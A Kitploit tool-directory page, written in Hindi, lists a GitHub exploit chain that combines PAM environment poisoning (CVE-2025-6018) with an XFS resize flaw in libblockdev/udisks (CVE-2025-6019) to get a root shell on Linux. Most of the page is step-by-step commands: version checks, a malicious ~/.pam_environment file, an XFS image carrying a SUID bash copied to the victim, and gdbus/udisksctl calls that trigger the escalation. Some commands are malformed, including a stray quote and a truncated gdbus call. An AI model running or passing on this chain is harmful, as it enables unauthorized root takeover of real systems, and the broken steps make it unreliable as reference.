Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6018-and-CVE-2025-6019 — PAM पर्यावरण विषाक्तता (CVE-2025-6018) और XFS फाइलसिस्टम रीसाइज़ (CVE-2025-6019) के माध्यम से विशेषाधिकार वृद्धि के लिए एक्सप्लॉइट श्रृंखला, जो Linux सिस्टम पर रूट शेल प्राप्त करने के लिए है। | Kitploit
उपकरण/GitHubGitHub/localh0ste/cve-2025-6018-and-cve-2025-6019
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHublocalh0ste/cve-2025-6018-and-cve-2025-6019

CVE-2025-6018-and-CVE-2025-6019

PAM पर्यावरण विषाक्तता (CVE-2025-6018) और XFS फाइलसिस्टम रीसाइज़ (CVE-2025-6019) के माध्यम से विशेषाधिकार वृद्धि के लिए एक्सप्लॉइट श्रृंखला, जो Linux सिस्टम पर रूट शेल प्राप्त करने के लिए है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

जांचें कि यह असुरक्षित है या नहीं

root@kitploit:~
rpm -q pam || dpkg -l | grep libpam

or

find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null

or
find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null

or

systemctl --version | head -1

यदि संस्करण शामिल है: (असुरक्षित PAM संस्करण का पता चला) ~संदर्भ cve_2025_6018

"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"

शोषण के चरण

दुर्भावनापूर्ण पर्यावरण फ़ाइल बनाना (CVE-2025-6018 पर्यावरण विषाक्तता)

root@kitploit:~
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
XDG_SESSION_TYPE OVERRIDE=x11
XDG_SESSION_CLASS OVERRIDE=user
XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime
SYSTEMD_LOG_LEVEL OVERRIDE=debug'''
EOF

XFS इमेज बनाएं (अपने PC पर) और दूरस्थ एक को भेजें

( CVE-2025-6019 -- libblockdev में XFS Resize के माध्यम से रूट एक्सेस)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount

#Create SUID bit as /bash shell

chmod 04555 ./xfs.mount/bash
umount ./xfs.mount
gzip xfs.image
scp ./xfs.image.gz hostname@<ip>:/home/<username>

पीड़ित मशीन पर

root@kitploit:~
gzip -d xfs.image.gz
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot

सिस्टम से पुनः कनेक्ट करें (सक्रिय सत्र को सक्रिय करने के लिए ssh पुनः कनेक्ट करें)

root@kitploit:~
udisksctl loop-setup --file ./xfs.image --no-user-interaction
while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
 /tmp/blockdev*/bash -p

रूट शेल प्राप्त करें

संदर्भ: https://www.exploit-db.com/exploits/52386

टूल डाउनलोड करें